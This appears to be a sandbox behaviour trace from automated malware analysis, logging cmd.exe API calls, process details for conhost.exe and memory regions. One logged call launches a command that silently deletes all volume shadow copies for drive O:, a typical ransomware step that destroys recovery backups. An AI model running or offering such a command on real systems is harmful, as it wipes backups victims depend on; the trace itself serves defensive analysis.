	[0269.044] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0269.044] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0269.044] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0269.044] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0269.044] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0269.045] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0269.045] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0269.045] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0269.045] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0269.045] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0269.045] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0269.045] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0269.045] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0269.045] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0269.045] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0269.045] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0269.045] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0269.045] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0269.046] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0269.046] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0269.046] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0269.046] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0269.046] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0269.046] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0269.046] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0269.046] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0269.046] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0269.046] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0269.046] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0269.046] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0269.046] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0269.047] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0269.047] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0269.047] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0269.047] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0269.047] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0269.047] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0269.047] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0269.047] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0269.048] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0269.048] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0269.048] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0269.048] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0269.048] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0269.048] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0269.048] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0269.048] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0269.048] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0269.048] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0269.048] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0269.048] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0269.048] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0269.049] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0269.049] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0269.049] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0269.049] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0269.049] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0269.049] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0269.049] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0269.049] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0269.049] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0269.049] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0269.049] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0269.049] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0269.050] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0269.050] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0269.050] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0269.050] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0269.050] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0269.050] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0269.050] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0269.050] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0269.050] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0269.050] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0269.050] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0269.050] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0269.050] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0269.050] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0269.051] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0269.051] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0269.052] GetProcessHeap () returned 0x47f0000
	[0269.052] RtlAllocateHeap (HeapHandle=0x47f0000, Flags=0x8, Size=0x210) returned 0x47f58b8
	[0269.052] GetProcessHeap () returned 0x47f0000
	[0269.052] RtlAllocateHeap (HeapHandle=0x47f0000, Flags=0x8, Size=0x64) returned 0x47f5ad0
	[0269.052] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0269.053] GetProcessHeap () returned 0x47f0000
	[0269.053] RtlAllocateHeap (HeapHandle=0x47f0000, Flags=0x8, Size=0x418) returned 0x47f5b40
	[0269.054] SetErrorMode (uMode=0x0) returned 0x0
	[0269.054] SetErrorMode (uMode=0x1) returned 0x0
	[0269.054] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x47f5b48, lpFilePart=0x18f08c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18f08c*="Desktop") returned 0x1d
	[0269.054] SetErrorMode (uMode=0x0) returned 0x1
	[0269.054] GetProcessHeap () returned 0x47f0000
	[0269.054] RtlReAllocateHeap (Heap=0x47f0000, Flags=0x0, Ptr=0x47f5b40, Size=0x56) returned 0x47f5b40
	[0269.055] GetProcessHeap () returned 0x47f0000
	[0269.055] RtlSizeHeap (HeapHandle=0x47f0000, Flags=0x0, MemoryPointer=0x47f5b40) returned 0x56
	[0269.055] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0269.055] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0269.056] GetProcessHeap () returned 0x47f0000
	[0269.056] RtlAllocateHeap (HeapHandle=0x47f0000, Flags=0x8, Size=0x182) returned 0x47f5ba0
	[0269.056] GetProcessHeap () returned 0x47f0000
	[0269.056] RtlAllocateHeap (HeapHandle=0x47f0000, Flags=0x8, Size=0x2fc) returned 0x47f05c8
	[0269.091] GetProcessHeap () returned 0x47f0000
	[0269.091] RtlReAllocateHeap (Heap=0x47f0000, Flags=0x0, Ptr=0x47f05c8, Size=0x184) returned 0x47f05c8
	[0269.091] GetProcessHeap () returned 0x47f0000
	[0269.091] RtlSizeHeap (HeapHandle=0x47f0000, Flags=0x0, MemoryPointer=0x47f05c8) returned 0x184
	[0269.091] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0269.092] GetProcessHeap () returned 0x47f0000
	[0269.092] RtlAllocateHeap (HeapHandle=0x47f0000, Flags=0x8, Size=0xe0) returned 0x47f5d30
	[0269.252] GetProcessHeap () returned 0x47f0000
	[0269.252] RtlReAllocateHeap (Heap=0x47f0000, Flags=0x0, Ptr=0x47f5d30, Size=0x76) returned 0x47f5d30
	[0269.252] GetProcessHeap () returned 0x47f0000
	[0269.252] RtlSizeHeap (HeapHandle=0x47f0000, Flags=0x0, MemoryPointer=0x47f5d30) returned 0x76
	[0269.254] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0269.254] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ee18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee18) returned 0xffffffff
	[0269.255] GetLastError () returned 0x2
	[0269.255] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0269.255] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ee18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee18) returned 0xffffffff
	[0269.257] GetLastError () returned 0x2
	[0269.257] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0269.257] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ee18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee18) returned 0x47f5db0
	[0269.258] GetProcessHeap () returned 0x47f0000
	[0269.258] RtlAllocateHeap (HeapHandle=0x47f0000, Flags=0x0, Size=0x14) returned 0x47f5df0
	[0269.258] FindClose (in: hFindFile=0x47f5db0 | out: hFindFile=0x47f5db0) returned 1
	[0269.258] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18ee18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee18) returned 0xffffffff
	[0269.258] GetLastError () returned 0x2
	[0269.258] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18ee18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee18) returned 0x47f5db0
	[0269.259] GetProcessHeap () returned 0x47f0000
	[0269.259] RtlReAllocateHeap (Heap=0x47f0000, Flags=0x0, Ptr=0x47f5df0, Size=0x4) returned 0x47f5df0
	[0269.259] FindClose (in: hFindFile=0x47f5db0 | out: hFindFile=0x47f5db0) returned 1
	[0269.260] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0269.260] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0269.260] GetConsoleTitleW (in: lpConsoleTitle=0x18f30c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0269.613] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f238, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f21c | out: lpAttributeList=0x18f238, lpSize=0x18f21c) returned 1
	[0269.614] UpdateProcThreadAttribute (in: lpAttributeList=0x18f238, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f224, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f238, lpPreviousValue=0x0) returned 1
	[0269.614] GetStartupInfoW (in: lpStartupInfo=0x18f270 | out: lpStartupInfo=0x18f270*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0269.614] GetProcessHeap () returned 0x47f0000
	[0269.615] RtlAllocateHeap (HeapHandle=0x47f0000, Flags=0x8, Size=0x18) returned 0x47f5db0
	[0269.615] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0269.615] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0269.615] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0269.615] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0269.615] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0269.615] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0269.615] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0269.616] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0269.616] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0269.616] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0269.616] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0269.616] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0269.616] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0269.616] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0269.616] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0269.616] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0269.616] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0269.616] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0269.616] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0269.616] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0269.617] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0269.617] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0269.617] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0269.617] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0269.617] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0269.617] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0269.617] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0269.617] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0269.617] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0269.617] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0269.617] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0269.617] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0269.617] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0269.618] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0269.618] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0269.618] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0269.618] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0269.618] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0269.618] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0269.618] GetProcessHeap () returned 0x47f0000
	[0269.618] RtlFreeHeap (HeapHandle=0x47f0000, Flags=0x0, BaseAddress=0x47f5db0) returned 1
	[0269.618] GetProcessHeap () returned 0x47f0000
	[0269.618] RtlAllocateHeap (HeapHandle=0x47f0000, Flags=0x8, Size=0xa) returned 0x47f5db0
	[0269.618] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0269.624] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=O: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f1c0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=O: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f20c | out: lpCommandLine="vssadmin  Delete Shadows /For=O: /All /Quiet ", lpProcessInformation=0x18f20c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x1344, dwThreadId=0x13a4)) returned 1
	[0269.655] CloseHandle (hObject=0xa4) returned 1
	[0269.655] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0269.655] GetProcessHeap () returned 0x47f0000
	[0269.655] RtlFreeHeap (HeapHandle=0x47f0000, Flags=0x0, BaseAddress=0x47f7938) returned 1
	[0269.655] GetEnvironmentStringsW () returned 0x47f6d90*
	[0269.655] GetProcessHeap () returned 0x47f0000
	[0269.655] RtlAllocateHeap (HeapHandle=0x47f0000, Flags=0x8, Size=0xb9c) returned 0x47f7938
	[0269.655] memcpy (in: _Dst=0x47f7938, _Src=0x47f6d90, _Size=0xb9c | out: _Dst=0x47f7938) returned 0x47f7938
	[0269.656] FreeEnvironmentStringsA (penv="=") returned 1
	[0269.656] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0290.138] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18f1a4 | out: lpExitCode=0x18f1a4*=0x2) returned 1
	[0290.140] CloseHandle (hObject=0xa8) returned 1
	[0290.141] _vsnwprintf (in: _Buffer=0x18f28c, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f1ac | out: _Buffer="00000002") returned 8
	[0290.142] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0290.143] GetProcessHeap () returned 0x47f0000
	[0290.143] RtlFreeHeap (HeapHandle=0x47f0000, Flags=0x0, BaseAddress=0x47f7938) returned 1
	[0290.143] GetEnvironmentStringsW () returned 0x47f6d90*
	[0290.143] GetProcessHeap () returned 0x47f0000
	[0290.143] RtlAllocateHeap (HeapHandle=0x47f0000, Flags=0x8, Size=0xbc2) returned 0x47fbfe0
	[0290.143] memcpy (in: _Dst=0x47fbfe0, _Src=0x47f6d90, _Size=0xbc2 | out: _Dst=0x47fbfe0) returned 0x47fbfe0
	[0290.144] FreeEnvironmentStringsA (penv="=") returned 1
	[0290.144] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0290.144] GetProcessHeap () returned 0x47f0000
	[0290.144] RtlFreeHeap (HeapHandle=0x47f0000, Flags=0x0, BaseAddress=0x47fbfe0) returned 1
	[0290.144] GetEnvironmentStringsW () returned 0x47f6d90*
	[0290.144] GetProcessHeap () returned 0x47f0000
	[0290.145] RtlAllocateHeap (HeapHandle=0x47f0000, Flags=0x8, Size=0xbc2) returned 0x47fbfe0
	[0290.145] memcpy (in: _Dst=0x47fbfe0, _Src=0x47f6d90, _Size=0xbc2 | out: _Dst=0x47fbfe0) returned 0x47fbfe0
	[0290.145] FreeEnvironmentStringsA (penv="=") returned 1
	[0290.145] GetProcessHeap () returned 0x47f0000
	[0290.145] RtlFreeHeap (HeapHandle=0x47f0000, Flags=0x0, BaseAddress=0x47f5db0) returned 1
	[0290.145] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f238 | out: lpAttributeList=0x18f238) 
	[0290.145] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0290.146] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0290.858] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0290.858] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0291.045] _get_osfhandle (_FileHandle=0) returned 0x38
	[0291.046] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0291.426] SetConsoleInputExeNameW () returned 0x1
	[0291.426] GetConsoleOutputCP () returned 0x1b5
	[0291.804] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0291.805] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0292.212] exit (_Code=2) 

Thread:
	id = 285
	os_tid = 0xcb0


Process:
	id = "45"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x2e8fd000"
	os_pid = "0xca0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "44"
	os_parent_pid = "0xc9c"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 3415
	        start_va = 0x29600000
	          end_va = 0x297fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000029600000"
	        filename = ""

Region:
	              id = 3416
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 3417
	        start_va = 0xa8294e0000
	          end_va = 0xa82951ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000a8294e0000"
	        filename = ""

Region:
	              id = 3418
	        start_va = 0xa829600000
	          end_va = 0xa8297fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000a829600000"
	        filename = ""

Region:
	              id = 3419
	        start_va = 0x1f876620000
	          end_va = 0x1f87663ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f876620000"
	        filename = ""

Region:
	              id = 3420
	        start_va = 0x1f876640000
	          end_va = 0x1f876654fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f876640000"
	        filename = ""

Region:
	              id = 3421
	        start_va = 0x7df5ff670000
	          end_va = 0x7ff5ff66ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff670000"
	        filename = ""

Region:
	              id = 3422
	        start_va = 0x7ff7ff8d0000
	          end_va = 0x7ff7ff8f2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff8d0000"
	        filename = ""

Region:
	              id = 3423
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 3424
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 3425
	        start_va = 0x1f876660000
	          end_va = 0x1f87694ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f876660000"
	        filename = ""

Region:
	              id = 3434
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 3435
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 3436
	        start_va = 0x1f876620000
	          end_va = 0x1f87662ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f876620000"
	        filename = ""

Region:
	              id = 3437
	        start_va = 0x7ff7ff7d0000
	          end_va = 0x7ff7ff8cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff7d0000"
	        filename = ""

Region:
	              id = 3438
	        start_va = 0x1f876660000
	          end_va = 0x1f87671dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 3439
	        start_va = 0x1f876850000
	          end_va = 0x1f87694ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f876850000"
	        filename = ""

Region:
	              id = 3449
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 3450
	        start_va = 0xa829520000
	          end_va = 0xa82955ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000a829520000"
	        filename = ""

Region:
	              id = 3451
	        start_va = 0x1f876720000
	          end_va = 0x1f87677ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f876720000"
	        filename = ""

Region:
	              id = 3452
	        start_va = 0x1f876630000
	          end_va = 0x1f876636fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f876630000"
	        filename = ""

Region:
	              id = 3453
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 3454
	        start_va = 0x1f876720000
	          end_va = 0x1f876720fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f876720000"
	        filename = ""

Region:
	              id = 3455
	        start_va = 0x1f876770000
	          end_va = 0x1f87677ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f876770000"
	        filename = ""

Region:
	              id = 3456
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
